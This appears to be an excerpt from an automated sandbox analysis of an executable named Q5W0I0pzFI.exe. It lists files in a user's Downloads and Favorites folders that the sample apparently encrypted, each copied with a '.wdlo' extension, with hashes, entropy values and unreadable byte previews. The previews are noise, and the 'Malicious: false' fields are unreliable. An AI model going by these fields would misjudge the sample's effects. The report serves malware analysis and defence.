Preview:	VAMYD..NVj.#.$.S......w.$...!.z......B^...U.[...oM.q...~..&I.c...M..I-.%&.....f..F.<q.p.]Q.X....T;KUV....!...Z.gil.k..F....l?z>]....I]rKg.....E._.}Y...R.....-I.yr....?F..H.S%.....;..o..h..y.....f.B...j..p...l....-....[....zC...o......MP..&..."'.u.#>.e.....5JW...rjP..V..ipy..i...&.~1.F`v.\..Z....._.".X.k.+. o....".z...B..3<Vf...o....2 \|a.....l.{2........g.DJ....n.......j...!}H>.....`...T+..y..n.3...p..#.wT.s.(...w8.d.#.......f..p.r.].`..U7y.]..Bs: .....q..h.n..J.P..Qq.u.Xqdf.....j._..{$6.F....0..9..Nl..cX......Z...'E..d=)7.V..3....H........Dg..m\.s.?.x<.T..KUJ.5....../. D/...6:@I...yk[K..eE0AvW.'n+=.l&i...".t.x.r..).2..0.1.s$.NV....F...E.Zn..5..v...G\|...#..}...i&....;_....v.U..ca..L..b...G.........Q.Y....N.v....V.D##..I..P.o=...H....F..j.$.Z.Z.....#...mK.,.Y..Y..Pk}.D.l.....L........z"c...}.]..m.`O.N....V..@<.N...8.4....3].\..a..O.S>h..&xb^.....D..J.{Ax..`....l....Dey#.&;..O1.....L.\|...[3]^xD...... U.xa.S..U..(....Mlt$...+..."N"G7 .?.L9..t

C:\Users\user\Downloads\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847663305862084
Encrypted:	false
SSDEEP:	24:dhpvXLEXONAvMffgB0DtROtuR0oAdJkAicDCEnBrNZoh5GbD0rYYPSzLKpWFbD:bpvIeNBfWetR9i6AicTBrNZQGbDHYPRo
MD5:	9C86F59C00D269C84962B87AD6478C18
SHA1:	7686DB4A125AF2E44A104CA00B92B9B338462A3B
SHA-256:	4837C5EF12DDC28F8561E6276DA7021A8F56B5CAF3655D2DB2199DAD1C6BD2C5
SHA-512:	09023A815B2CD856E5BBD5600091C2F8CBBAE17A0A0F71606E7C3AE0C0996E24104A8EE2C229D3A5FC00A90284349ACD23473A63C03BEFA5A253CBE712CD8F5F
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.V.....H........M.D..W..Q?u...BZ,(\..q...w.}.z!...I.b/.........W..4.........6.S...a..-...V.p..b.'..v&`<.........06....;.x../6.......U.i.V..$......H.;gW.E..JH)....+3.@.Ix....- .V..K.!.Xh.Q.9."..#...n.......=.AZ9.Q.......p..........`...p6.G.zP.BX.Yw..\|N.....3...D.........x..2.n@..A^\..M~]...N.[y.T..}$1A..).?.............{..K...{.}.z...o.T......../...P\|mk.;i[...:GW......"cW.?m........._O<..B..Fz..+g!}]Q....v[T+.#..e.=h.....X_.m......m...S..N....cxY.\.{mvi?...j..:0..O...Ls)S.(.!..z..B.\|.ugz.qt...!...>..x.@......5..\|..C...X......T...YH.7..aR..2.C.>..}.ll....:.,"7*.O=.Y..r.,f........p...E..r.....-@.f..X.w.....g(...e`.j...\|H..2....EBh6R{..==...yv.=.s...I..v.9...J0"..~I...8....5.(7x._FU..Q.`...RS..~;#'.m..9@!,....0.b'........o.L...t.....}z..#....A.r.Y..H.i.F....jEO.x...)....R.47.V...B..._..DY..C..,{.1..r.......y4.]..C..#..l(..~...&.X.K....j.....e.......6..G...xJVV...&i .C..~..}#J...N..DW_4.a....\|.Fd.^=......6.v..[..+R..o...>JW.C..i;.

C:\Users\user\Downloads\WKXEWIOTXI.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847663305862084
Encrypted:	false
SSDEEP:	24:dhpvXLEXONAvMffgB0DtROtuR0oAdJkAicDCEnBrNZoh5GbD0rYYPSzLKpWFbD:bpvIeNBfWetR9i6AicTBrNZQGbDHYPRo
MD5:	9C86F59C00D269C84962B87AD6478C18
SHA1:	7686DB4A125AF2E44A104CA00B92B9B338462A3B
SHA-256:	4837C5EF12DDC28F8561E6276DA7021A8F56B5CAF3655D2DB2199DAD1C6BD2C5
SHA-512:	09023A815B2CD856E5BBD5600091C2F8CBBAE17A0A0F71606E7C3AE0C0996E24104A8EE2C229D3A5FC00A90284349ACD23473A63C03BEFA5A253CBE712CD8F5F
Malicious:	false
Reputation:	unknown
Preview:	WKXEW.V.....H........M.D..W..Q?u...BZ,(\..q...w.}.z!...I.b/.........W..4.........6.S...a..-...V.p..b.'..v&`<.........06....;.x../6.......U.i.V..$......H.;gW.E..JH)....+3.@.Ix....- .V..K.!.Xh.Q.9."..#...n.......=.AZ9.Q.......p..........`...p6.G.zP.BX.Yw..\|N.....3...D.........x..2.n@..A^\..M~]...N.[y.T..}$1A..).?.............{..K...{.}.z...o.T......../...P\|mk.;i[...:GW......"cW.?m........._O<..B..Fz..+g!}]Q....v[T+.#..e.=h.....X_.m......m...S..N....cxY.\.{mvi?...j..:0..O...Ls)S.(.!..z..B.\|.ugz.qt...!...>..x.@......5..\|..C...X......T...YH.7..aR..2.C.>..}.ll....:.,"7*.O=.Y..r.,f........p...E..r.....-@.f..X.w.....g(...e`.j...\|H..2....EBh6R{..==...yv.=.s...I..v.9...J0"..~I...8....5.(7x._FU..Q.`...RS..~;#'.m..9@!,....0.b'........o.L...t.....}z..#....A.r.Y..H.i.F....jEO.x...)....R.47.V...B..._..DY..C..,{.1..r.......y4.]..C..#..l(..~...&.X.K....j.....e.......6..G...xJVV...&i .C..~..}#J...N..DW_4.a....\|.Fd.^=......6.v..[..+R..o...>JW.C..i;.

C:\Users\user\Downloads\WKXEWIOTXI.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858994764077058
Encrypted:	false
SSDEEP:	24:N3bslsPhVI3PnNfWkJlf29POuDR2ycrldL2Ez7mKl1eMdQgcTOIJpIxw1qIp01Wt:N3bs6Ph23PnNfWkJqfDR2ycrl00ldGyU
MD5:	AF501EB265E1827E811DF7797D4DB42E
SHA1:	1CE71F1907C5B0418AEA4D429331C412D1A2CEE2
SHA-256:	96D7B980C5B44EFAE3DA7B0663756CD789E767A8890445C3C8CC0666040129F5
SHA-512:	4AB0BF613F45E24A1AE86D7DC1D243CFF76E572C94469C68693DA8C7BA76CE6E34E46E74026C0A574EBCA6C0026EC718E1CAB1E55812FFFC587B877235FC9A97
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..e....lk..r$!\z. .+.3..@XP..K..^#.^.]H..-j;..nfF+ ..i`@......8a@.G..A.....f(#.>P...C.q.A.h...BvZ.3..ct...f.A..........#./?[.w..q.m........M%b.G...~"........)/5...c....?X..l..V.../..wp(..v.DBI.r._D.m..?.m.<E.H......DR.....RM...E.M.<).u.}3.@.Z2..N.... T.u.....p.a......M..w).$q.m...]s..t..tO%.\|.{....v.......^.....T....%.3j.(n..e..>....l.r....\.S9}.......S...-......4...".S..g../.......f....^.....>1X...r$......U_....#..DQ.%...E.U.p..~}i.x4F9..........5..j.....,.q@.r..<{....Ej1..V..[.....Tv.9%.10.Y..\|\....v.............NK.U..=.._...p.....Q.....@...m.......43.E.....W.........E...g.(dYu.3u..T.hLO.+...\|..'$...o..2;U.j..c;.9.0.4..J...8..X..`....F......b..SG."ri.S@......-.7.%.".......#.,..s.?.9e_..T.......pY!..a/.g@..B....YoZNW.J/[..\|U..(.....~.Q.....P.._..O.hAx...S@../.Q:x...&N......Om.;.".g.k.....o{....][...?;..b.B..&..X4}3m.3K,6H..I6.+&.N&..h@6 ..4)z....Ht.>.!....HK*.t..........I.;.....dHlXe'd..(.LJ..e>.\..lj.KcN.A(>.Jbx..N..M.

C:\Users\user\Downloads\WKXEWIOTXI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.858994764077058
Encrypted:	false
SSDEEP:	24:N3bslsPhVI3PnNfWkJlf29POuDR2ycrldL2Ez7mKl1eMdQgcTOIJpIxw1qIp01Wt:N3bs6Ph23PnNfWkJqfDR2ycrl00ldGyU
MD5:	AF501EB265E1827E811DF7797D4DB42E
SHA1:	1CE71F1907C5B0418AEA4D429331C412D1A2CEE2
SHA-256:	96D7B980C5B44EFAE3DA7B0663756CD789E767A8890445C3C8CC0666040129F5
SHA-512:	4AB0BF613F45E24A1AE86D7DC1D243CFF76E572C94469C68693DA8C7BA76CE6E34E46E74026C0A574EBCA6C0026EC718E1CAB1E55812FFFC587B877235FC9A97
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..e....lk..r$!\z. .+.3..@XP..K..^#.^.]H..-j;..nfF+ ..i`@......8a@.G..A.....f(#.>P...C.q.A.h...BvZ.3..ct...f.A..........#./?[.w..q.m........M%b.G...~"........)/5...c....?X..l..V.../..wp(..v.DBI.r._D.m..?.m.<E.H......DR.....RM...E.M.<).u.}3.@.Z2..N.... T.u.....p.a......M..w).$q.m...]s..t..tO%.\|.{....v.......^.....T....%.3j.(n..e..>....l.r....\.S9}.......S...-......4...".S..g../.......f....^.....>1X...r$......U_....#..DQ.%...E.U.p..~}i.x4F9..........5..j.....,.q@.r..<{....Ej1..V..[.....Tv.9%.10.Y..\|\....v.............NK.U..=.._...p.....Q.....@...m.......43.E.....W.........E...g.(dYu.3u..T.hLO.+...\|..'$...o..2;U.j..c;.9.0.4..J...8..X..`....F......b..SG."ri.S@......-.7.%.".......#.,..s.?.9e_..T.......pY!..a/.g@..B....YoZNW.J/[..\|U..(.....~.Q.....P.._..O.hAx...S@../.Q:x...&N......Om.;.".g.k.....o{....][...?;..b.B..&..X4}3m.3K,6H..I6.+&.N&..h@6 ..4)z....Ht.>.!....HK*.t..........I.;.....dHlXe'd..(.LJ..e>.\..lj.KcN.A(>.Jbx..N..M.

C:\Users\user\Downloads\ZTGJILHXQB.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.874104129879241
Encrypted:	false
SSDEEP:	24:8RoZu37Bn6H3hZZr1Id+8odvSktEm1Nj5eQdgQmpXj6BpCUo4XI5kFqsd6WFbD:5Z+a3l1Id+XdvSkt/x5e+TWjCAiCmcWt
MD5:	A5C7EED7428FB65827C9598BCAB800A8
SHA1:	00B8D6497BF9DFA0AE18E69970A81E30C2309132
SHA-256:	003E2D9CDC35F39E2764B3DD8F9BA69FBDF0F7C3B1CC4220EC0AEA6AA9E67F36
SHA-512:	0FC0C2AFBD43843DA779DD31AEADB437F2C11BA50E354C7A3DB352728924B9296D01231A48B201E0BEAAFE169BE716F09092DD15A2D3DA7A3728815A29AD544D
Malicious:	false
Reputation:	unknown
Preview:	ZTGJIN...k...W.V...g>.k...9....P.....T......<n!V.....7....P.-8w..2Jb}..C..$.4'w..8...Tje......9.u..ql.({...n.....J_..9I...+.....f.1$5e.\|yFq.}_.....O....e_.[......%........5..j....$]..WH.\|.@A...(.{.R.r(.7.Dg...!..-PE...9OI.I...Gg...4\|3.o....4.I..:..E.....t*.D..5.sTp#G..tM....._k.U<.[.u..L#O.M.2....aY^..."n..."..x^.G".].~.....Gl.@N:h....`..`.X..?.Sr..............H..1.E).\.f....G\.K...".C.7..W....5"#x.....K..............\....CI]i=o..\|....5j...K...F..-....../..6...i....97}.........s.M....f.E..%.1...04^.....\|..P.Jh^9$..5.X(l......c.Om.%..a......i....Tm.....`\|..zxqN...Ha.a..tY..T...x.........^j..>.......I.L...r...:..m.....h.K@.Y.(.......q.w.n...%.le.-.........}...j/.E.. ..z.1...}C;. =..+&....X.....N.g.R?..raM..%..O..b......MP5%K..L...y...0..PLA.:..J....F..zN.q....P....a/Cl~.^...'.O.n.&8......U,.Rxn=<2.Cf.H...a.o..[$...,.......y...}v". 3+C......].<../.b.J.\|.t...^.g...M.Mm.Qa.b.acr+yF.1.V...V...$.......t..s.vF...+.r.;...}.....&.oX.M..........e..

C:\Users\user\Downloads\ZTGJILHXQB.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.874104129879241
Encrypted:	false
SSDEEP:	24:8RoZu37Bn6H3hZZr1Id+8odvSktEm1Nj5eQdgQmpXj6BpCUo4XI5kFqsd6WFbD:5Z+a3l1Id+XdvSkt/x5e+TWjCAiCmcWt
MD5:	A5C7EED7428FB65827C9598BCAB800A8
SHA1:	00B8D6497BF9DFA0AE18E69970A81E30C2309132
SHA-256:	003E2D9CDC35F39E2764B3DD8F9BA69FBDF0F7C3B1CC4220EC0AEA6AA9E67F36
SHA-512:	0FC0C2AFBD43843DA779DD31AEADB437F2C11BA50E354C7A3DB352728924B9296D01231A48B201E0BEAAFE169BE716F09092DD15A2D3DA7A3728815A29AD544D
Malicious:	false
Reputation:	unknown
Preview:	ZTGJIN...k...W.V...g>.k...9....P.....T......<n!V.....7....P.-8w..2Jb}..C..$.4'w..8...Tje......9.u..ql.({...n.....J_..9I...+.....f.1$5e.\|yFq.}_.....O....e_.[......%........5..j....$]..WH.\|.@A...(.{.R.r(.7.Dg...!..-PE...9OI.I...Gg...4\|3.o....4.I..:..E.....t*.D..5.sTp#G..tM....._k.U<.[.u..L#O.M.2....aY^..."n..."..x^.G".].~.....Gl.@N:h....`..`.X..?.Sr..............H..1.E).\.f....G\.K...".C.7..W....5"#x.....K..............\....CI]i=o..\|....5j...K...F..-....../..6...i....97}.........s.M....f.E..%.1...04^.....\|..P.Jh^9$..5.X(l......c.Om.%..a......i....Tm.....`\|..zxqN...Ha.a..tY..T...x.........^j..>.......I.L...r...:..m.....h.K@.Y.(.......q.w.n...%.le.-.........}...j/.E.. ..z.1...}C;. =..+&....X.....N.g.R?..raM..%..O..b......MP5%K..L...y...0..PLA.:..J....F..zN.q....P....a/Cl~.^...'.O.n.&8......U,.Rxn=<2.Cf.H...a.o..[$...,.......y...}v". 3+C......].<../.b.J.\|.t...^.g...M.Mm.Qa.b.acr+yF.1.V...V...$.......t..s.vF...+.r.;...}.....&.oX.M..........e..

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.429085201107013
Encrypted:	false
SSDEEP:	12:jqoYbz7luu15VQ5z3W/UISNLg898Dj6Z3cii9a:jqtbPX152CUo89eWFbD
MD5:	DE15F4B79DF60DCC296B769F9672EFE2
SHA1:	6889A673047D60DB65E9D2FB25DD797EB219C800
SHA-256:	0B68D96E6961971FCBAABD429311E5E36363782E0EFC46164894657453B3B637
SHA-512:	9E779E90E087016B0FD9EA5144BC3E4986A523838CA979CF3CFCC7B937588D4280B77C214EF1B44399094EB0EAB297692D08470A40969A783C6350AACB2F9DAA
Malicious:	false
Reputation:	unknown
Preview:	[{000.%..!.{U.i.]kR.f..N.5.7l.J..E.u.&.v.b..,..A...[..ONM7.^@d..s.U....v........#\.R.ONd..t.iN>.CeP..QD.F...d...7.=b{......L...;...C..{....O.&T...5s...q.t3...1C........_.............."./.R...r;.UU_vP...V3?..Q..(.D.5<.\|.p.t..].[C....z.Dq......2...k.IN...W.\...aWH..C..x..4h.k....T.Nr ..'..d...\|.K...\|U...p~o.`jk...H.U.p..va.K.+R..FA..O.Zb=l.XG4....xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Amazon.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.429085201107013
Encrypted:	false
SSDEEP:	12:jqoYbz7luu15VQ5z3W/UISNLg898Dj6Z3cii9a:jqtbPX152CUo89eWFbD
MD5:	DE15F4B79DF60DCC296B769F9672EFE2
SHA1:	6889A673047D60DB65E9D2FB25DD797EB219C800
SHA-256:	0B68D96E6961971FCBAABD429311E5E36363782E0EFC46164894657453B3B637
SHA-512:	9E779E90E087016B0FD9EA5144BC3E4986A523838CA979CF3CFCC7B937588D4280B77C214EF1B44399094EB0EAB297692D08470A40969A783C6350AACB2F9DAA
Malicious:	false
Reputation:	unknown
Preview:	[{000.%..!.{U.i.]kR.f..N.5.7l.J..E.u.&.v.b..,..A...[..ONM7.^@d..s.U....v........#\.R.ONd..t.iN>.CeP..QD.F...d...7.=b{......L...;...C..{....O.&T...5s...q.t3...1C........_.............."./.R...r;.UU_vP...V3?..Q..(.D.5<.\|.p.t..].[C....z.Dq......2...k.IN...W.\...aWH..C..x..4h.k....T.Nr ..'..d...\|.K...\|U...p~o.`jk...H.U.p..va.K.+R..FA..O.Zb=l.XG4....xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.561445498438472
Encrypted:	false
SSDEEP:	12:5fWo6ezedqwsgdGktUNsNxUCZYanVWHaluysKfSKC35C49OlnzIveoHOHDj6Z3cq:oPdqwsgdGhNmUMpMHOuKVqh9Ol+ZujWt
MD5:	7D4CD5062820FA7A5D36643A60A4AC06
SHA1:	EB5A8C0778B9351DFA34D7E4B1E5016267CC9DFA
SHA-256:	0B9EF4FAC0308DFDD39D179D7D9998DC7B0356B9EF27D8A60E7400F41C39F5A7
SHA-512:	941F068F05CC9D8F7D400D5DFF469A960A48750258DFA13929A28B87C687875F9FF2E6F6F88643CC5625DC9214121AF902E1509D1787E93DEC3E34FD54028EB5
Malicious:	false
Reputation:	unknown
Preview:	[{000[<..>..XJ..zx}..q......tF.....G<.P).m...Q.7B.dBX.t....J.h...;J../Z."@..N.....M..`.p;i(L#XKp.\|..U...}..oH5.w....=.q.,\....q..#.....l...,...x..k...........qb..}EY.I....m.......y.s3~bke.k...Q9.....b.2Zr.;O3@1..t.1gY..p1..G.R\|."F....p<v.bh.dK.A.+...z..x..:..{h&)..OR.&..S$N..O....=j..4.....U...7...Z..c.U[.M.@.r..R?..?v.vN..k6{........Sn.>AR.aG...%.M.v.g.ZN.xw.G.....,..3..V..{...X...+(C..Ss[u......T(gq....20....*iH.....TS.<#8.....W.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.561445498438472
Encrypted:	false
SSDEEP:	12:5fWo6ezedqwsgdGktUNsNxUCZYanVWHaluysKfSKC35C49OlnzIveoHOHDj6Z3cq:oPdqwsgdGhNmUMpMHOuKVqh9Ol+ZujWt
MD5:	7D4CD5062820FA7A5D36643A60A4AC06
SHA1:	EB5A8C0778B9351DFA34D7E4B1E5016267CC9DFA
SHA-256:	0B9EF4FAC0308DFDD39D179D7D9998DC7B0356B9EF27D8A60E7400F41C39F5A7
SHA-512:	941F068F05CC9D8F7D400D5DFF469A960A48750258DFA13929A28B87C687875F9FF2E6F6F88643CC5625DC9214121AF902E1509D1787E93DEC3E34FD54028EB5
Malicious:	false
Reputation:	unknown
Preview:	[{000[<..>..XJ..zx}..q......tF.....G<.P).m...Q.7B.dBX.t....J.h...;J../Z."@..N.....M..`.p;i(L#XKp.\|..U...}..oH5.w....=.q.,\....q..#.....l...,...x..k...........qb..}EY.I....m.......y.s3~bke.k...Q9.....b.2Zr.;O3@1..t.1gY..p1..G.R\|."F....p<v.bh.dK.A.+...z..x..:..{h&)..OR.&..S$N..O....=j..4.....U...7...Z..c.U[.M.@.r..R?..?v.vN..k6{........Sn.>AR.aG...%.M.v.g.ZN.xw.G.....,..3..V..{...X...+(C..Ss[u......T(gq....20....*iH.....TS.<#8.....W.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.417780002562976
Encrypted:	false
SSDEEP:	12:nUXxGNtBZVpBbedfPtC9lQO+tDj6Z3cii9a:/t3PBbUflalQdpWFbD
MD5:	9A2120430758B67D70DF753444EBC0C3
SHA1:	A966C4A4FDB6B36398319460377CF4056911F79F
SHA-256:	EEF793A17F68B7ED8FD32F50B7FC1E7B9A18FFAEE066757F27244C73EE707C26
SHA-512:	CE5F7D07089006D3F54EE6534DD82D7C5F48014B539549E0FCB174BE26DB96794B815BADF90D6910E6479099767AABDC5EBD2FF03EC5F65632D50B4296180571
Malicious:	false
Reputation:	unknown
Preview:	[{000....^.K.<.%A.5....AJ....$.B]$*.z...o@..W.F../U....\(..o.p;.2z.`.}:...8[..b..U..l.T..hs2../......-(c...mO....t.W..b.5-y.X..b.M.c.tX....h^yok..nD..B.l."G..V..Nh...d.w.R.j.....$.-....'..\|.4)^...:..}5..H.....0(..X....g6...@W2..u&...S{@r....l.%...z~;JC.n[..V....P.`!..7./4.....e..}....\..m...Yk.c.........2..r......]0\........>..h.........S..y..7....TxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.417780002562976
Encrypted:	false
SSDEEP:	12:nUXxGNtBZVpBbedfPtC9lQO+tDj6Z3cii9a:/t3PBbUflalQdpWFbD
MD5:	9A2120430758B67D70DF753444EBC0C3
SHA1:	A966C4A4FDB6B36398319460377CF4056911F79F
SHA-256:	EEF793A17F68B7ED8FD32F50B7FC1E7B9A18FFAEE066757F27244C73EE707C26
SHA-512:	CE5F7D07089006D3F54EE6534DD82D7C5F48014B539549E0FCB174BE26DB96794B815BADF90D6910E6479099767AABDC5EBD2FF03EC5F65632D50B4296180571
Malicious:	false
Reputation:	unknown
Preview:	[{000....^.K.<.%A.5....AJ....$.B]$*.z...o@..W.F../U....\(..o.p;.2z.`.}:...8[..b..U..l.T..hs2../......-(c...mO....t.W..b.5-y.X..b.M.c.tX....h^yok..nD..B.l."G..V..Nh...d.w.R.j.....$.-....'..\|.4)^...:..}5..H.....0(..X....g6...@W2..u&...S{@r....l.%...z~;JC.n[..V....P.`!..7./4.....e..}....\..m...Yk.c.........2..r......]0\........>..h.........S..y..7....TxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.533431415996745
Encrypted:	false
SSDEEP:	12:Gdo8e2ejYHIL7mCThg70y0o1WBvDj6Z3cii9a:tYej0ITO7MrWFbD
MD5:	AA22FEC25184B6B6D28CB735796CADA7
SHA1:	3D5C801E941C820957682ECF2BE219B5F336531E
SHA-256:	CB3677689F3156A230B3D47CDB0BF7C8BA444EFCE58C454AD1F36EB6A81421E0
SHA-512:	6B66FBCC6D57E3D39A75296839DBF7B3237D3F209504032BB91FE0AB3CD012CF3936107C4227109FAD58EC6FCA699FCA1896C44165BF72D38CCBBDC2FA9F036F
Malicious:	false
Reputation:	unknown
Preview:	[{000~.u..b%...t..!:.A[$.~.e..<...#s..\..K...,...\\|`..i...e.m.P..........SZ.....e.}.g.)[.=..9.....-....">Og(...a....Om......`..(..!f..".1 +p...#L.R^{.b.7.. .C.q..@....M..W.....&......LJ.).p..FOS._)....;n.......u0pD.=.{.(L p..U....r..(`.At..[..g....;4k..D..i6.......Uw..B.a#.O.R. \[.2.^....T....Q'y..A1.aB.wi.X......w..k.).s.gvzv.....v...8'..R...z.zu...xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.533431415996745
Encrypted:	false
SSDEEP:	12:Gdo8e2ejYHIL7mCThg70y0o1WBvDj6Z3cii9a:tYej0ITO7MrWFbD
MD5:	AA22FEC25184B6B6D28CB735796CADA7
SHA1:	3D5C801E941C820957682ECF2BE219B5F336531E
SHA-256:	CB3677689F3156A230B3D47CDB0BF7C8BA444EFCE58C454AD1F36EB6A81421E0
SHA-512:	6B66FBCC6D57E3D39A75296839DBF7B3237D3F209504032BB91FE0AB3CD012CF3936107C4227109FAD58EC6FCA699FCA1896C44165BF72D38CCBBDC2FA9F036F
Malicious:	false
Reputation:	unknown
Preview:	[{000~.u..b%...t..!:.A[$.~.e..<...#s..\..K...,...\\|`..i...e.m.P..........SZ.....e.}.g.)[.=..9.....-....">Og(...a....Om......`..(..!f..".1 +p...#L.R^{.b.7.. .C.q..@....M..W.....&......LJ.).p..FOS._)....;n.......u0pD.=.{.(L p..U....r..(`.At..[..g....;4k..D..i6.......Uw..B.a#.O.R. \[.2.^....T....Q'y..A1.aB.wi.X......w..k.).s.gvzv.....v...8'..R...z.zu...xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.477498761233878
Encrypted:	false
SSDEEP:	12:znXUXGZVuXR5u31MWsX/HQ3CDj6Z3cii9a:zEX0uXmFMdHWFbD
MD5:	6751E764144F401AFB65D2EED177A41F
SHA1:	D07529213DD2D20802EBD1F37BC5AFE1892F1423
SHA-256:	1C57D4274BF84429EAA9EDB9571A4A10E43496AF1BF76A334DDB5D2B1EBAA775
SHA-512:	980225F40E8BB2ACDADA0F56B47F4E9D47B2FB06A46F768EAFBE0B9283BD84EF36C1888D0A03E5B33DC5544EE4ED24089D176A5DF222C61E60172B91DCD14918
Malicious:	false
Reputation:	unknown
Preview:	[{0007A...t.;x.0..}..U.X..:.....m.n.#p..q`.<.._..g............ ..Jl..8..T.M;.:!...."~......ph...{....=.\|.~.Q.h...x.t..j.A..g^..D....Z1............z.D.b....AOW.#[..d...B....6.$.....A./.Q...y{\S..\c..&..Y.........>.. ._.e......E!.\|.sy3[..1.C.Y.9!.Tq=..'...k@qa<....KW.Js..U[....NQ_h-.}.4......4X....R...x./P.*..v..D'..j.Qu.J).......?..{7.k.....Fs..Ro.ouxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.477498761233878
Encrypted:	false
SSDEEP:	12:znXUXGZVuXR5u31MWsX/HQ3CDj6Z3cii9a:zEX0uXmFMdHWFbD
MD5:	6751E764144F401AFB65D2EED177A41F
SHA1:	D07529213DD2D20802EBD1F37BC5AFE1892F1423
SHA-256:	1C57D4274BF84429EAA9EDB9571A4A10E43496AF1BF76A334DDB5D2B1EBAA775
SHA-512:	980225F40E8BB2ACDADA0F56B47F4E9D47B2FB06A46F768EAFBE0B9283BD84EF36C1888D0A03E5B33DC5544EE4ED24089D176A5DF222C61E60172B91DCD14918
Malicious:	false
Reputation:	unknown
Preview:	[{0007A...t.;x.0..}..U.X..:.....m.n.#p..q`.<.._..g............ ..Jl..8..T.M;.:!...."~......ph...{....=.\|.~.Q.h...x.t..j.A..g^..D....Z1............z.D.b....AOW.#[..d...B....6.$.....A./.Q...y{\S..\c..&..Y.........>.. ._.e......E!.\|.sy3[..1.C.Y.9!.Tq=..'...k@qa<....KW.Js..U[....NQ_h-.}.4......4X....R...x./P.*..v..D'..j.Qu.J).......?..{7.k.....Fs..Ro.ouxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.462765827506934
Encrypted:	false
SSDEEP:	12:tmDPL0dzOB1NEUIT+EvUf3sZvLTnj0v0KogDj6Z3cii9a:thO2U3ES34vnj0vS6WFbD
MD5:	244ED3AEC8A2E216F212091B78BD17D8
SHA1:	66785FD821BF8A2B27BECA7574118E72CEECA850
SHA-256:	DD1031FF6A3CA0A51EDEDC0A33212171EFC203D909683E53D2ED3C804701DEF3
SHA-512:	12327338E9E8DB421FEF97CDCEC2F8F27EED4625D2B5EEF86B991A74192391BBA264DFA9C0C6AACDC0857F4CC09BC4CDE27263A6FE794C475860A9A15E5E0144
Malicious:	false
Reputation:	unknown
